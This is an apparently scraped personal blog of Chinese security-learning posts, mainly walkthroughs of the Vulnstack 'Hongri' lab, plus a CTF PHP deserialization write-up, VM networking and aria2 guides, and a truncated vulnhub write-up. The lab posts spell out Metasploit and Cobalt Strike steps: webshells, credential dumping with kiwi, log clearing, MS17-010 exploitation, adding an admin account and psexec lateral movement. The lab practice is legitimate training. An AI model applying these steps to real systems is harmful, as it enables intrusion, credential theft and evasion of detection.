yuki’s Blog

记录第二次打红日靶场一

Tue, 05 Dec 2023 00:00:00 GMT

😀

上一次记录主要使用msf马，没有打穿内网，于是重新上网找资料复现一下CS马的全流程，这次的环境和攻击流程都感觉流畅了很多，即便是第二次打红日，感觉还是收获满满

📝 主旨内容

靶场统一密码：hongrisec@2019

winserver2008和win2k3第一次登录需要修改密码（貌似会影响到后续的psexec横向，我这里没有修改密码，ping通后就不管了）

拓扑图

攻击机可达

win7双网卡对外ip（vmnet8）：192.168.235.131 (攻击机可访问)

对内ip（vmnet9）：192.168.52.129 （只能内网访问，即win2k3、win2008可访问）

攻击机不可达

win2k3 内网ip（vmnet9）：192.168.52.141

win2008 内网ip（vmnet9）：192.168.52.138

攻击机*（kali）对外ip（vmnet8）：192.168.235.137

php探针：/

phpinfo:/phpinfo.php

phpmyadmin:/phpmyadmin

phpmyadmin弱口令

root root

访问/test.php

这里其实是已经写进去了，一句话木马执行

蚁剑连接一句话木马（vmtools安装后记得重启一下，不然测试连接的时候会弹窗然后连不上。。。）

cms：/yxcms

这里可以看到前端的模板文件

试试编辑模板

尝试修改一下文件，然后去主页刷新查找

说明这里对应这模板文件，可以在这里写一句话木马

连接蚁剑

上传并且执行cs马/msf马

CS马

添加监听器并生成对应payload

通过蚁剑上传cs马上线

抓取明文密码（为横向做准备）

横向渗透

【横向移动】PsExec工具远程命令执行横向移动 - 知乎 (zhihu.com)

psexec需要正确凭证才可使用，前面已经抓取了明文密码

创建smb监听器

Cobalt Strike使用PsExec等工具时通常需要SMB（Server Message Block）监听器的原因是 PsExec 利用了 SMB 协议进行远程执行。SMB是一种在局域网中共享文件和打印机的协议，而PsExec则通过SMB协议来实现在远程系统上执行命令的功能。PsExec通常使用SMB（Server Message Block）协议来执行远程命令。

以下是使用SMB监听器的一些关键原因：

远程执行命令： PsExec主要用于在远程系统上执行命令。当Cobalt Strike使用PsExec时，它需要在目标系统上创建一个SMB会话，以便通过SMB传输执行文件和与目标系统进行通信。

文件传输： PsExec在执行远程命令时，可能需要将执行所需的文件传输到目标系统。这些文件通常包含执行文件、Payload等。SMB监听器提供了一个方便的通道，使得这些文件可以通过SMB协议传输。

身份验证：使用SMB监听器可以更容易地实现对目标系统的身份验证。这对于在远程系统上执行命令而不引起不必要的警报和检测非常重要。

创建smb监听器

提权+psexec横向

模块提权

使用poc模块提权，psexec需要system权限

用提权后的主机，使用psexec横向渗透即可

psexec提权

对administrator进行psexec横向提权，用新的会话（SYSTEM权限用户）对其它主机进行psexec横向

🤗 总结归纳

重新打一遍红日靶场1，发现真的有很多细节

📎 参考文章

一些引用

引用文章

💡

有关Notion安装或者使用上的问题，欢迎您在底部评论区留言，一起交流~

[网鼎杯 2020 青龙组]AreUSerialz

Wed, 11 Oct 2023 00:00:00 GMT

😀

这里写文章的前言：一个简单的开头,简述这篇文章讨论的问题、目标、人物、背景是什么？并简述你给出的答案。

可以说说你的故事：阻碍、努力、结果成果，意外与转折。

📝 主旨内容

[网鼎杯 2020 青龙组]AreUSerialz（BUUCTF）

题目到手第一步，代码审计

①对每个函数进行联系

②对代码流程分析

关键点在于file_get_content()函数，可以用来读取flag文件，对file_get_content()函数追踪后流程如下所示

$str = $_GET['str']

is_vail($str)

unserialize($str)

___destruct()

process()

read()

output($res)

$res == read()

$res = file_get_contents(filename)

同时：

（1）FileHandler三个变量权限都是protected，而protected权限的变量在序列化的时会有%00*%00字符，%00字符的ASCII码为0，就无法通过上面的is_valid函数校验

绕过方法1：对于PHP版本7.1+，对属性的类型不敏感，可以将protected类型改为public，直接进行序列化，这样既不会出现%00*%00，同时也可以输出变量。　　绕过方法2：利用大写S采用的16进制，来绕过is_valid中对空字节的检查。 //00 替换 %00 。　（2）强比较和弱比较的利用。将op设置为int型的2，op === "2"为false，op == "2"为true,绕过析构函数中的if判断，同时又可以调用到读文件的流程

第一遍传入

可以发现index.php的绝对路径/var/www/html/inde.php,同时flag.php在同一目录下

故/var/www/html/flag.php

payload如下

（只在burp中看见flag，浏览器没渲染出来？）

🤗 总结归纳

考点：

（1）FileHandler三个变量权限都是protected，而protected权限的变量在序列化的时会有%00*%00字符，%00字符的ASCII码为0，就无法通过上面的is_valid函数校验

📎 参考文章

一些引用

引用文章

💡

有关Notion安装或者使用上的问题，欢迎您在底部评论区留言，一起交流~

记录红日靶场一

Thu, 31 Aug 2023 00:00:00 GMT

😀

闲着没事打了一下红日靶场，打了时间有点长（太菜了），便记录一下过程

📝 红日靶场

红日靶场

参考文章：

ATT&CK红队评估（红日靶场一） - FreeBuf网络安全行业门户

红日(vulnstack)安全实战靶场 | Justin博客 (alexjakin.github.io)

msf手册 - 知乎 (zhihu.com)

三层网络靶场搭建&MSF内网渗透 - 网安 (wangan.com)

实战｜记一次基础的内网Vulnstack靶机渗透一 (qq.com)

主机发现

受害主机: 192.128.52.128

kali: 192.128.52.129

win攻击机： 192.128.52.133 （192.168.235.145）

ubuntu攻击机器： 192.128.235.149

全端口扫描

tcp扫描

udp扫描

web服务

后台扫描

php探针：/

phpinfo:/phpinfo.php

phpmyadmin:/phpmyadmin

存在弱口令：root/root

查看是否有文件写入权限

查看是否有开启日志记录

显示未开启

手动打开

修改日志路径

访问/test.php

日志写马

这里其实是已经写进去了，一句话木马的重点在于木马执行，不要看到notice，没显示一句话木马就以为没有成功

使用蚁剑连接

在这里发现还有个站点yxcms

打开蚁剑终端查看权限

确认为系统权限

yxcms：/yxcms

文章后台，带默认账号密码

后台可以控制模板

此处可以修改模板代码，插入一句话木马

结合内容管理找到对应模板代码的位置

连接蚁剑

msf马

参考：msf手册 - 知乎 (zhihu.com)

生成木马

蚁剑传马并且执行

msf监听

上线，getuid查看用户

ps可以查看马子的进程（shell.exe是后面的cs马）

这里看见马子msf.exe进程pid是1028

apache的进程是4440

进程迁移

为了防止目标服务器检查到我们上传的hack.exe木马，我们可以将进程迁移到其他正常进程，

这里我的hack.exe木马进程id是1028，Apache进程是4440

然后清除痕迹clearev

关闭防火墙

run post/windows/manage/enable_rdp

开远程桌面

rdesktop 192.168.52.128

抓取hash

使用kiwi（mimikazt平替）

kiwi模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的，则必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载kiwi并且查看系统明文。如果目标系统是32位的，则没有这个限制

由于对象是64位win7，接下来要将进程迁移到其中一个64位程序

发现需要system权限后又转去了516进程

migrate 516

load kiwi

creds_all

msf搭建代理

ATT&CK红队评估（红日靶场一） - FreeBuf网络安全行业门户

①msf连接受害主机

②新建路由

run post/multi/manage/autoroute

查看路由

run autoroute -p

挂起会话，建立socks

background #挂起会话

use auxiliary/server/socks_proxy

set VERSION 4a

set SRVHOST 127.0.0.1

options #查看使用的参数

exploit

成功后出现一个job（攻击任务）

jobs查看

修改proxychains.conf，如图

基本上参照上面你建立socks那一步的参数来添加进去

（其他教程用的是proxychains4.conf？我报错这里说用的是proxychans.conf）

使用代理只要像上面的指令前加上proxychains就可以了

扫描内网存活主机

use post/windows/gather/arp_scanner

set RHOSTS 192.168.52.0/24

set SESSION 1 #指定会话1（我图片指定了session2，session -l查看后台会话）

exploit

udp协议发现内网存活主机

use auxiliary/scanner/discovery/udp_sweep

set RHOSTS 192.168.52.0/24

exploit

结合来看，内网中有三台主机128（代理用的受害主机）、138、141

内网横移

不知道为什么我这一步扫出的端口很少

192.168.52.138

端口扫描

开放了25、110端口

扫描tcp：25，110端口

192.168.52.141

端口扫描

开放了25、110端口

扫描tcp：25，110端口

永恒之蓝（测试，不知道为什么445端口没扫出来）

扫描192.168.52.141发现存在永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010

set RHOSTS 192.168.52.141

exploit

漏洞利用

第一次尝试失败，模块一

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/bind_tcp

set rhost 192.168.52.141

run

第二次尝试失败，模块二

发现只支持打64位系统，不支持32位

第三次尝试成功，模块三

新建用户‘hack’

net user hack qaz@123 /add #新建用户（要强密码并且不能包含用户名）

net user #查看用户

加入管理员组

set COMMAND net localgroup administrators hack /add

exploit

set COMMAND net localgroup administrators

exploit

后续开3386端口、使用telnet的过程没有成功。。。就不写上来了

其他

cs马

同样蚁剑传马，然后执行上线

sleep 0加快回显

由于受害机默认60秒进行一次回传，为了实验效果我们这里把时间设置成5，但实际中频率不宜过快，容易被发现。

shell systeminfo查看信息

抓取密码

探测内网存活主机

内网信息收集

该域名为god.org，域控为OWA$，域管理员为Administrator ，内网网段为192.168.52.1/24，我们用Ping命令探测域控的ip

域控ip

新增一个用户，并改为管理员

whami/Hongri

🤗 总结归纳

有很多地方还不够完善，比如端口扫描结果和其他教程的不一样（不知道是哪一步有问题），后续的维权没做完，开3386端口、使用telnet的过程没有成功等。。。

📎 参考文章

一些引用

引用文章

💡

有关Notion安装或者使用上的问题，欢迎您在底部评论区留言，一起交流~

hyper-v虚拟机连接vmware虚拟机

Fri, 30 Jun 2023 00:00:00 GMT

😀

以下是我使用hyper-v连接vmware遇到的一些问题和解决办法

📝 主旨内容

hyper-v虚拟机连接vmware虚拟机

因为本人hyper-v虚拟机作为攻击机，vmware作为靶机，一般情况下两者无法互相ping通，于是研究解决方法

询问gpt：

实验环境hyper-v虚拟机和VMware虚拟机均为kali

两台虚拟机均为双网卡配置，一个网卡用来访问外网，一个网卡用来hyper-v与vmware互联（内网连接）

第一个网卡一般来说你的虚拟机能访问外网就是默认配置好的

故以下详细讲解第二个网卡的配置

首先对vmware进行操作

vmware配置

vmware的虚拟机设置：

重启网卡

接下来对hyper-v操作

hyper-v虚拟机配置

kali编辑网卡配置（通过hdcp自动获取ip地址）

重启网卡：

🤗 总结归纳

以上内容均为原创，转载请标明出处

📎 参考文章

Kali之——设置静态IP_man interfaces 参数_冰河的博客-CSDN博客

VMware Workstation虚拟机双网卡设置 - 简书 (jianshu.com)

💡

欢迎您在底部评论区留言，一起交流~

aira2使用分享

Fri, 30 Jun 2023 00:00:00 GMT

😀

听闻@zixv33的安利aria2，前来尝试体验一番

📝 主旨内容

感谢来自大佬Chiahong的分享

aira2学习使用

转自：aria2 設定教學 – 強大又輕巧的下載工具，支援 BT、斷點續傳 | Then Notes 隨筆

aria2 設定教學 – 強大又輕巧的下載工具，支援 BT、斷點續傳‣

aria2 是一款強大又輕巧的下載工具，5 MB 不到的大小支援了 HTTP、HTTPS、FTP、SFTP、BitTorrent (BT 種子) 和 Metalink 等通訊協定。aria2 的原理跟 IDM 相似，都是透過分割檔案、增加連線數進行下載，可以提升下載速度。

如果您不想動手設定這些有的沒的，其實可以試試看 Motrix 這個開源的下載工具，其核心也是 aria2 哦！但已經全部設定好了，安裝後即可使用。
官網: https://motrix.app/
GitHub: https://github.com/agalwood/Motrix

# 功能特色

多點下載

多協定下載

檔案分割下載

可使用代理伺服器

可使用 JSON-RPC、XML-RPC 遠端控制

# 下載

請根據自己的作業系統下載對應的版本，32 位元請選擇 win-32bit，64 位元請選擇 win-64bit。下載連結在 Assets 中，檔名看起來可能像 aria2-1.XX.0-win-XXbit-build1.zip。

前往 GitHub 下載

官方網站

# 安裝、設定

由於 aria2 是非常輕量化的下載工具，所以並沒有 GUI 介面（別擔心，有人寫出 Web 介面，後面會講到！），需要自行建立設定檔。

首先解壓縮 aria2 至硬碟中的任何地方，例如 C:\aria2，在資料夾中依序建立 5 個檔案 aria2.conf、aria2.session、Start.vbs、Status.bat、Stop.bat、Restart.bat。

建議您不要使用「記事本」建立這些檔案，可能會因為編碼問題造成錯誤。可以使用 Visual Studio Code 或 Notepad++ 等軟體編輯，編碼請選擇 UTF-8，且副檔名一定要正確，注意不要存成 .txt 純文字檔哦！

# 手動建立 `aria2.conf` 檔案

用文字編輯軟體貼上以下設定，可以自行調整功能。

2020/06/30 更新，新增額外的 Tracker，有沒有效果筆者不敢保證

# 手動建立 `aria2.session` 檔案（Session 儲存位置）

空白檔案，不用填入任何東西。沒錯，不用懷疑，存檔完就可以關掉了！

注意！aria2.session 雖然是空白檔案，但一定要建立，否則會打不開 aria2

# 手動建立 `Start.vbs` 檔案（讓 aria2 背景執行）

# 手動建立 `Status.bat` 檔案（顯示 aria2 狀態）

# 手動建立 `Stop.bat` 檔案（關閉 aria2）

# 手動建立 `Restart.bat` 檔案（重啟 aria2）

# 執行 aria2

以上建立的 1 個 vbs 檔、3 個 bat 檔的功能就如同其名稱，現在我們要啟動 aria2，所以請點兩下 Start.vbs，讓 aria2 在背景執行。因為是在背景執行，所以

不會有任何畫面！不會有任何畫面！不會有任何畫面！

這很重要所以說 3 次。

# 檢查 aria2 狀態

如果您要確定 aria2 是否真的在執行，可以點兩下 Status.bat 查看狀態。應該會看到類似下面這樣的資訊，就表示 aria2 已經在背景運作了。

# 除錯

如果您在改完設定檔 aria2.conf 後遇到任何問題，或 Status.bat 也說沒有 aria2 在背景執行，說明設定檔有錯誤。如果您熟悉使用命令提示字元 / PowerShell / Windows Terminal 的操作，可以直接下指令：

來檢查是哪邊報錯。如果您不熟悉這些操作，請用「修改一次、執行一次」的方式除錯。即每改完一次 aria2.conf，就用 Restart.bat 重啟，並用 Status.bat 檢查到底有沒有正確執行。

# 重啟或關閉 aria2

點兩下 Restart.bat 即會重啟 aria2，您會看到一個黑畫面一閃而過，這是正常的，黑畫面消失後就代表 aria2 已經成功重啟了。

若要關閉 aria2，點兩下 Stop.bat 後看到類似以下訊息就是成功關閉囉！

# aria2 控制台

筆者喜歡的控制台為 mayswind 所編寫的 AriaNg，如果有需要自行架設控制台的朋友，可以前往 AriaNg 的專案頁面下載。

前往 ~~aria2 控制台~~ ※ 2022 更新，因 Chome/Edge 新版會有 CORS 問題，而無法連線。開啟 F12 會顯示 Access to XMLHttpRequest at http://localhost:6800/jsonrpc from origin http://ariang.mayswind.net has been blocked by CORS policy.

※【步驟更新】請下載 Releases 頁面中，Assets 下之 AriaNg-版本-AllInOne.zip 來使用。解壓縮後點兩下開啟 index.html 即可。https://github.com/mayswind/AriaNg/releases

請點選「AriaNg 設定」 →「RPC」→ 在 Aria2 RPC 位址中填入「localhost」即可。

再來就可以盡情享受快速下載囉！

可以看到 aria2 一次以 10 個連線數下載檔案，有助於提升下載速度！

下載完的檔案位置位在 aria2 目錄的 Download 資料夾，假設程式路徑是 C:\aria2，那下載資料夾就是 C:\aria2\Download。如需修改下載資料夾，請參照上面的 aria2.conf 中的第 7 行 (dir=Download)，資料夾名稱請不要使用中文或特殊符號，以免發生錯誤。

# Docker 版

推薦使用 P3TERX 的 Aria2-Pro。筆者就架了一個 Aria2-Pro 在自己的伺服器上，若需要長時間下載的檔案就丟上去慢慢抓，十分方便。但請您盡量不要開放外部存取！如有相關需求也務必注意安全性，最好限制僅能特定 IP 能連、可用反向代理、且金鑰一定要夠複雜。

以下設定中 aria2 在 6800 port，AriaNg 則在 6880 port。

# docker-compose.yml

本文由大佬 Chiahong 分享，如需引用時請註明來源，感謝您！

🤗 总结归纳

以下是我根据文章整理后的工具，欢迎自取

使用方法：Start.vbs→Status.bat(确认进程)→AriaNG文件夹里面的.html文件

整合.zip

2948.7KB

📎 参考文章

aria2 設定教學 – 強大又輕巧的下載工具，支援 BT、斷點續傳 | Then Notes 隨筆

💡

欢迎您在底部评论区留言，一起交流~

jarbas—vulnhub

Wed, 28 Jun 2023 00:00:00 GMT

😀

这里写文章的前言：一个简单的开头,简述这篇文章讨论的问题、目标、人物、背景是什么？并简述你给出的答案。

可以说说你的故事：阻碍、努力、结果成果，意外与转折。

📝 主旨内容

jarbas靶机

发现主机

靶机：192.168.235.134

kali：192.168.235.125

重装了一遍环境，内网IP后面有变动

扫描端口

nmap自动脚本扫描工具①

nmap端口扫描②

扫主机开放端口

扫描tcp

扫描udp

脚本扫描

web服务

80端口

访问

目录爆破

feroxbuster扫

gobutster扫描

扫描出

/.html (Status: 403) [Size: 207] /index.html (Status: 200) [Size: 32808] /access.html (Status: 200) [Size: 359] /.html (Status: 403) [Size: 207]

ip/access.html

yuki’s Blog

记录第二次打红日靶场一

📝 主旨内容

拓扑图

攻击机可达

攻击机不可达

php探针：/

phpinfo:/phpinfo.php

phpmyadmin:/phpmyadmin

phpmyadmin弱口令

cms：/yxcms

连接蚁剑

CS马

横向渗透

创建smb监听器

提权+psexec横向

模块提权

psexec提权

🤗 总结归纳

📎 参考文章

[网鼎杯 2020 青龙组]AreUSerialz

📝 主旨内容

[网鼎杯 2020 青龙组]AreUSerialz（BUUCTF）

🤗 总结归纳

📎 参考文章

记录红日靶场一

📝 红日靶场

红日靶场

主机发现

全端口扫描

tcp扫描

udp扫描

web服务

后台扫描

php探针：/

phpinfo:/phpinfo.php

phpmyadmin:/phpmyadmin

yxcms：/yxcms

msf马

进程迁移

关闭防火墙

开远程桌面

抓取hash

使用kiwi（mimikazt平替）

msf搭建代理

扫描内网存活主机

内网横移

永恒之蓝（测试，不知道为什么445端口没扫出来）

新建用户‘hack’

其他

cs马

抓取密码

探测内网存活主机

内网信息收集

域控ip

新增一个用户，并改为管理员

🤗 总结归纳

📎 参考文章

hyper-v虚拟机连接vmware虚拟机

📝 主旨内容

hyper-v虚拟机连接vmware虚拟机

🤗 总结归纳

📎 参考文章

aira2使用分享

📝 主旨内容

aira2学习使用

aria2 設定教學 – 強大又輕巧的下載工具，支援 BT、斷點續傳‣

# 功能特色

# 下載

# 安裝、設定

# 手動建立 aria2.conf 檔案

# 手動建立 aria2.session 檔案（Session 儲存位置）

# 手動建立 Start.vbs 檔案（讓 aria2 背景執行）

# 手動建立 Status.bat 檔案（顯示 aria2 狀態）

# 手動建立 Stop.bat 檔案（關閉 aria2）

# 手動建立 Restart.bat 檔案（重啟 aria2）

# 執行 aria2

# 檢查 aria2 狀態

# 除錯

# 重啟或關閉 aria2

# 手動建立 `aria2.conf` 檔案

# 手動建立 `aria2.session` 檔案（Session 儲存位置）

# 手動建立 `Start.vbs` 檔案（讓 aria2 背景執行）

# 手動建立 `Status.bat` 檔案（顯示 aria2 狀態）

# 手動建立 `Stop.bat` 檔案（關閉 aria2）

# 手動建立 `Restart.bat` 檔案（重啟 aria2）